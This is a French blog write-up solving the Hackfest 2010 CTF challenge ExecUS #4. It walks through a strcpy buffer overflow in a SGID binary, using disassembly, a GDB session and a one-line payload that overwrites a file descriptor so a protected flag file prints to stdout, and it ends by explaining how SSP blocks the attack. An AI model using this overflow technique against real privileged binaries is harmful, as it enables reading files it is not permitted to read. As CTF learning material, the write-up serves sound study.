
Solution ExecUS #4 du Hackfest 2010

Ce weekend se tenait le Hackfest 2010 à Québec et le samedi soir son traditionnel concours de sécurité. Notre équipe a terminé en 2e place, félicitations à nos bons amis d'Amish Security qui l'ont emporté haut la main.

NOTE: j'utilise ici une version recompilée du binaire, les adresses qui apparaissent dans cette solution ne sont probablement pas les mêmes que celles du binaire original. Si vous voulez l'essayer sur un Linux récent, assurez vous de désactiver le mode SSP :

gcc -fno-stack-protector -o execus4 execus4.c 

Cet article présente la solution de l'épreuve ExecUS #4, dont voici le code :



 Le programme ouvre le fichier flag.txt (j'ai changé le nom mais le principe reste le même) contenant le flag et le copie dans /dev/null. Le fichier flag.txt  n'est pas accessible directement, mais le binaire est configuré avec le bit SGID et le groupe y a accès en lecture.

À la ligne 27, on observe un cas de buffer overflow très standard puisque la taille de argv[1] ne fait l'objet d'aucune vérification au préalable.

strcpy(buf, argv[1]);

En observant l'ordre de déclaration des variables, il est probable que la variable ofd puisse être écrasée, ce que nous pouvons vérifier désassemblant le code :

 804856a:    e8 41 fe ff ff           call   80483b0 <open@plt>
 804856f:    89 84 24 28 01 00 00     mov    %eax,0x128(%esp)
 8048576:    c7 44 24 04 01 00 00     movl   $0x1,0x4(%esp)
 804857d:    00
 804857e:    8d 44 24 1a              lea    0x1a(%esp),%eax
 8048582:    89 04 24                 mov    %eax,(%esp)
 8048585:    e8 26 fe ff ff           call   80483b0 <open@plt>
 804858a:    89 84 24 24 01 00 00     mov    %eax,0x124(%esp)
 8048591:    8b 45 0c                 mov    0xc(%ebp),%eax
 8048594:    83 c0 04                 add    $0x4,%eax
 8048597:    8b 00                    mov    (%eax),%eax
 8048599:    89 44 24 04              mov    %eax,0x4(%esp)
 804859d:    8d 44 24 24              lea    0x24(%esp),%eax
 80485a1:    89 04 24                 mov    %eax,(%esp)
 80485a4:    e8 57 fe ff ff           call   8048400 <strcpy@plt>

Comme on peut le voir, le résultat du 2e appel à open qui ouvre /dev/null en écriture est écrit à ESP+0x124 (ofd) et l'adresse à laquelle strcpy écrit (buf) est ESP+0x24. La variable ofd est donc situé 0x100 octets après buf, Convertit en décimal l'espace est de 256 octets, ce qui correspond à la longueur de buf.

On peut donc écraser ofd, mais en quoi celà peut nous être est utile ? Pour le comprendre, il faut se référer au fonctionnement d'UNIX. La variable ofd contient ce qu'on appelle un descripteur de fichier qui est un index dans la table des fichiers ouverts par le processus. Pour tous les processus, le système d'exploitation crée les descripteurs spéciaux suivants :

Entrée standard (stdin)  : 0
Sortie standard (stdout) : 1
Sortie d'erreur (stderr) : 2

La solution est maintenant évidente, il suffit d'écraser ofd avec la valeur 1 pour que la clef soit écrite sur la sortie standard et apparaisse à l'écran. Nous allons construire une chaine constituée de 256 caractères pour remplir buf et de la valeur 1 pour écraser ofd.  On peut passer cette valeur en paramètre à GDB en utilisant la commande suivante :

run $(ruby -e 'print "A" * 256 + "\x01"')

On peut vérifier le bon fonctionnement de notre exploit à l'aide de GDB. On commence par mettre un breakpoint juste avant l'appel à strcpy pour examiner la valeur de ofd.

(gdb) b *0x080485a4
Punto de interrupción 1 at 0x804858a: file execus4.c, line 25.
(gdb) run $(ruby -e 'print "A" * 256 + "\x01"')
Starting program: /home/ekse/code/execus4 $(ruby -e 'print "A" * 256 + "\x01"')
Dev null is an awesome 100% compression ratio, secure, backup device.

Breakpoint 1, 0x080485a4 in main (argc=2, argv=0xbffff3b4)
(gdb) x/x $esp+0x124
0xbffff2f4:    0x00000006

La valeur de ofd est actuellement 0x06. Le listing suivant montre que la valeur est bien écrasée par notre overflow.

(gdb) nexti
(gdb) x/65x $esp+0x24
0xbffff1f4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff204:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff214:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff224:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff234:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff244:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff254:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff264:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff274:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff284:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff294:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2a4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2b4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2c4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2d4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2e4:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff2f4:    0x00000001
(gdb) x/x $esp+0x124
0xbffff2f4:    0x00000001

Maintenant que nous savons que notre exploit est fonctionnel, il suffit de lancer le binaire directement pour obtenir le flag (je n'ai malheureusement pas sauvegardé le flag original) .

ekse@eclipse:~/code$ ./execus4 $(ruby -e 'print "A" * 256 + "\x01"')
Dev null is an awesome 100% compression ratio, secure, backup device.
ALLGLORYTOTHEHYPNOTOAD


Un mot sur SSP

Le binaire utilisé lors de la compétition n'était pas compilé avec les mécanismes de sécurité tel que SSP pour facilité la solution. L'utilisation de SSP permet de bloquer cette avenue d'exploitation. Ce n'est pas toutefois pas par l'utilisation du canari (qui faisait d'ailleurs l'objet d'une très bonne présentation par Paul Rascagneres au Hackfest) puisque nous ne cherchons pas à écraser l'adresse de retour. 

La mitigation vient plutôt du fait que SSP réorganise les variables sur la stack pour placer les tableaux après les variables de taille fixe. Le listing suivant montre le même code présenté plus haut mais lorsque le mode SSP est activé :

 80485f5:    e8 fa fd ff ff           call   80483f4 <open@plt>
 80485fa:    89 44 24 30              mov    %eax,0x30(%esp)
 80485fe:    c7 44 24 04 01 00 00     movl   $0x1,0x4(%esp)
 8048605:    00
 8048606:    8d 84 24 39 01 00 00     lea    0x139(%esp),%eax
 804860d:    89 04 24                 mov    %eax,(%esp)
 8048610:    e8 df fd ff ff           call   80483f4 <open@plt>
 8048615:    89 44 24 34              mov    %eax,0x34(%esp)
 8048619:    8b 44 24 1c              mov    0x1c(%esp),%eax
 804861d:    83 c0 04                 add    $0x4,%eax
 8048620:    8b 00                    mov    (%eax),%eax
 8048622:    89 44 24 04              mov    %eax,0x4(%esp)
 8048626:    8d 44 24 39              lea    0x39(%esp),%eax
 804862a:    89 04 24                 mov    %eax,(%esp)
 804862d:    e8 12 fe ff ff           call   8048444 <strcpy@plt>
 

Comme on peut le voir, la variable ofd se trouve à ESP+0x34 et buf commence à ESP+0x39. On ne peut donc plus écraser ofd.